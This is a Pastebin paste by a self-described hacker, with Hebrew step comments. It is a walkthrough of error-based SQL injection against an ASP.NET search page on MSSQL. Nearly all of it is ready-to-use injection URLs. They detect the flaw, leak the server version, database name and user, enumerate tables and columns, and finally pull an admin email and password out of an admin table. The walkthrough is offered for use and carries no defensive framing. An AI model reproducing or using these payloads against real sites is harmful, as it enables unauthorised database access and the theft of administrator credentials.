API tools faq
paste
zurael_sTz

ASPX Injection is also similar to PHP based SQL Injection

zurael_sTz
Mar 2nd, 2017
257
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.83 KB | None | 0 0
raw download clone embed print report
  1. <===============Hacker zurael sTz===============>
  2. =================twitter=============================
  3. https://twitter.com/zurael_stz
  4. =================facebook============================
  5. https://www.facebook.com/sTzisrael/
  6. =====================================================
  7. =================telegram============================
  8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
  9. =====================================================
  10. <===============Hacker zurael sTz===============>
  11.  
  12. ASPX Injection is also similar to PHP based SQL Injection
  13.  
  14.  
  15. נוסיף גרש בשביל לבדוק אם יש פגיעה
  16. 1:
  17. http://website.org/search.aspx?txt=EDIT’
  18. [http://www.interload.co.il/upload/7523377.jpg]
  19.  
  20. 2:
  21. having 1=1
  22. http://website.org/search.aspx?txt=EDIT' having 1=1--
  23. [http://www.interload.co.il/upload/6799804.jpg]
  24.  
  25. 3:
  26. לבדוק תגירסא
  27. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,@@version)--
  28. [http://www.interload.co.il/upload/7281846.jpg]
  29.  
  30. 4:
  31. כדי לדעת את שם מסד הנתונים
  32. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,db_name())--
  33. [http://www.interload.co.il/upload/9341072.jpg]
  34.  
  35. 5:
  36. לבדוק שם משתמש
  37. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,user_name())--
  38. [http://www.interload.co.il/upload/8894171.jpg]
  39.  
  40. 6:
  41. לברור את שמות הטבלה
  42. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables))--
  43. [http://www.interload.co.il/upload/6959797.jpg]
  44.  
  45. 7:
  46. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('pp_category')))--
  47.  
  48. 8:
  49. לגלות את העמודות "pp_admin_tb"
  50. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb' and column_name not in('adminsign_id')))-- (email_is)
  51. [http://www.interload.co.il/upload/5097816.jpg]
  52.  
  53. 9:
  54. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='pp_admin_tb' and column_name not in('adminsign_id','email_id')))-- (password)
  55. [http://www.interload.co.il/upload/5497103.jpg]
  56.  
  57.  
  58. עכשיו נעשה חילוץ נתונים כגון השם משתמש והסיסמא
  59. במקרה שלנו המייל זה השם משתמש
  60.  
  61. name table :pp_admin_tb
  62. eamil_id
  63. password
  64.  
  65. 10:
  66. עכשיו נחלץ את השם משתמש
  67. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 email_id from pp_admin_tb))--
  68. [http://www.interload.co.il/upload/2031325.jpg]
  69.  
  70. 11:
  71. עכשיו נחלץ את הסיסמא
  72. http://website.org/search.aspx?txt=EDIT' and 1=convert(int,(select top 1 password from pp_admin_tb))--
  73. [http://www.interload.co.il/upload/7595613.jpg]
  74.  
  75. #zurael_sTz
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!